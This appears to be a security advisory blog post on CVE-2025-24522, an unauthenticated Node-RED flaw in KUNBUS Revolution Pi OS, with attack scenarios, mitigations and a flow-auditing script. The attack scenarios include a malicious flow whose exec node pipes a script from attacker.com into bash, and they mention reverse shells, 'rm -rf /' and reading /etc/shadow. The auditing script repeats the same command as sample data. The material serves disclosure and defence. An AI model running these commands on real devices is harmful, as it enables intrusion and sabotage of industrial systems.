Critical Vulnerability in KUNBUS Revolution Pi OS

Overview 

A critical security vulnerability, CVE-2025-24522, has been identified in KUNBUS Revolution Pi OS Bookworm (01/2025 release). The flaw stems from missing authentication in the Node-RED server, allowing unauthenticated attackers to gain full control over the Node-RED instance and execute arbitrary commands on the underlying operating system.

With a CVSS-B score of 9.3 (CRITICAL), this vulnerability poses a severe risk to industrial systems and IoT deployments using Revolution Pi devices. (Published: 05/01/2025)


Technical Details

Root Cause

The Node-RED instance in Revolution Pi OS does not enforce authentication by default, meaning:

  • The Node-RED dashboard is accessible without credentials.
  • Attackers can inject malicious flows, modify existing ones, or execute system commands via Node-RED functions.
  • Since Node-RED often runs with elevated privileges, this can lead to full system compromise.

Affected Versions

  • KUNBUS Revolution Pi OS Bookworm (01/2025 release)
  • Earlier versions may also be vulnerable if Node-RED was not manually secured.


Attack Scenarios

Scenario 1: Remote Exploitation via Exposed Node-RED Dashboard

  1. Discovery: An attacker scans the local network or internet-facing Revolution Pi devices and finds an exposed Node-RED dashboard (http://<target-ip>:1880).

  2. Unauthenticated Access: Since no authentication is required, the attacker accesses the Node-RED editor.

  3. Malicious Flow Injection:

  • The attacker creates a new flow with an "exec" node configured to run OS commands (e.g., rm -rf /, wget malware.sh, or a reverse shell).

  • Example malicious flow (JSON):

    [
        {
            "id": "inject-node",
            "type": "inject",
            "payload": "malicious_command",
            "wires": [["exec-node"]]
        },
        {
            "id": "exec-node",
            "type": "exec",
            "command": "sh -c 'curl http://attacker.com/malware.sh | bash'",
            "wires": []
        }
    ]

  4. Deployment & Execution:

  • The attacker deploys the flow, triggering command execution on the Revolution Pi.

  • The attacker gains remote shell access, exfiltrates data, or disrupts operations.

Scenario 2: Lateral Movement in Industrial Networks

  1. Initial Access: An attacker compromises a weakly secured Revolution Pi in a factory network.

  2. Privilege Escalation:

  • Using Node-RED, the attacker runs (bash):

    cat /etc/shadow   # Extract password hashes
    sudo su -         # Gain root if Node-RED runs as sudo

  3. Pivoting:

  • The attacker scans internal networks (nmap -sn 192.168.1.0/24) and exploits other devices.

  • They deploy ransomware or sabotage industrial processes.


Mitigation & Fixes

Immediate Actions

  1. Enable Node-RED Authentication:

  • Edit /home/pi/.node-red/settings.js and set (JavaScript):

    adminAuth: {
        type: "credentials",
        users: [{
            username: "admin",
            password: "$2a$08$hashed_password",
            permissions: "*"
        }]
    }

  • Generate a hashed password using (bash):

    node-red-admin hash-pw

  2. Restrict Network Access:

  • Use a firewall to block unauthorized access to port 1880.

  • Example (ufw). Note that ufw applies the first matching rule, so the allow rule for the trusted subnet must come before the blanket deny; in the reverse order the deny matches first and the allow never takes effect:

    sudo ufw allow from 192.168.1.0/24 to any port 1880   # trusted subnet first
    sudo ufw deny 1880                                     # then block everyone else

  3. Update Revolution Pi OS:

  • Check for patches from KUNBUS and apply them immediately.

Long-Term Best Practices

  • Disable Node-RED if unused.
  • Monitor for suspicious flows (e.g., unexpected exec nodes).
  • Segment industrial networks to prevent lateral movement.
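The "monitor for suspicious flows" item above can be automated. The script below is an added example, not code from the original post or from KUNBUS: it parses a Node-RED flows file and reports nodes able to run OS commands. The sample flow content is constructed (it mirrors the malicious flow shown earlier), and the child_process heuristic for function nodes is an assumption, not a Node-RED rule.

```javascript
// Added example (not from the original post or from KUNBUS): audit a
// Node-RED flows file and report nodes that can run OS commands, i.e. the
// "unexpected exec nodes" check from the best-practices list.

// Constructed sample flows.json content: the post's malicious flow plus two
// benign nodes, so the script runs offline without a real device.
const SAMPLE_FLOWS = JSON.stringify([
  { id: "inject-node", type: "inject", payload: "malicious_command", wires: [["exec-node"]] },
  { id: "exec-node", type: "exec", command: "sh -c 'curl http://attacker.com/malware.sh | bash'", wires: [] },
  { id: "fn-1", type: "function", func: "msg.payload = msg.payload * 2; return msg;", wires: [] },
  { id: "dbg-1", type: "debug", wires: [] }
]);

// "exec" nodes run a shell command directly. As a heuristic (an assumption,
// not a Node-RED rule), function nodes whose code mentions child_process are
// also flagged, since that is the usual route from JavaScript to a shell.
const RISKY_FUNCTION_PATTERN = /child_process|execSync\s*\(|spawn\s*\(/;

// Returns one finding per suspicious node: { id, type, reason, detail }.
function auditFlows(flowsJson) {
  const nodes = JSON.parse(flowsJson);
  if (!Array.isArray(nodes)) throw new Error("flows file must contain a JSON array");
  const findings = [];
  for (const node of nodes) {
    if (node.type === "exec") {
      findings.push({ id: node.id, type: node.type,
                      reason: "exec node runs OS commands", detail: node.command || "" });
    } else if (node.type === "function" && RISKY_FUNCTION_PATTERN.test(node.func || "")) {
      findings.push({ id: node.id, type: node.type,
                      reason: "function node references child_process", detail: "" });
    }
  }
  return findings;
}

// Wrapper for a real file, e.g. the flows file in the Node-RED user directory
// (the exact path on a given device is an assumption; adjust as needed).
function auditFlowsFile(path) {
  return auditFlows(require("fs").readFileSync(path, "utf8"));
}

// Run against the constructed sample and print a short report.
const findings = auditFlows(SAMPLE_FLOWS);
for (const f of findings) {
  console.log(`[${f.reason}] id=${f.id} type=${f.type}${f.detail ? " command=" + f.detail : ""}`);
}
console.log(`${findings.length} suspicious node(s) found`);
```

Run it against a real flows file with auditFlowsFile(path) from a scheduled job and alert on any non-empty result, or on any exec node whose command differs from an approved list.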


Conclusion

CVE-2025-24522 is a critical vulnerability that exposes Revolution Pi devices to remote code execution (RCE) due to missing Node-RED authentication. Attackers can take full control of affected systems, making this a high-priority issue for industrial and IoT environments.

Recommendation: Apply mitigations immediately and monitor for updates from KUNBUS.



Crow

physics, information technologies, author, educator
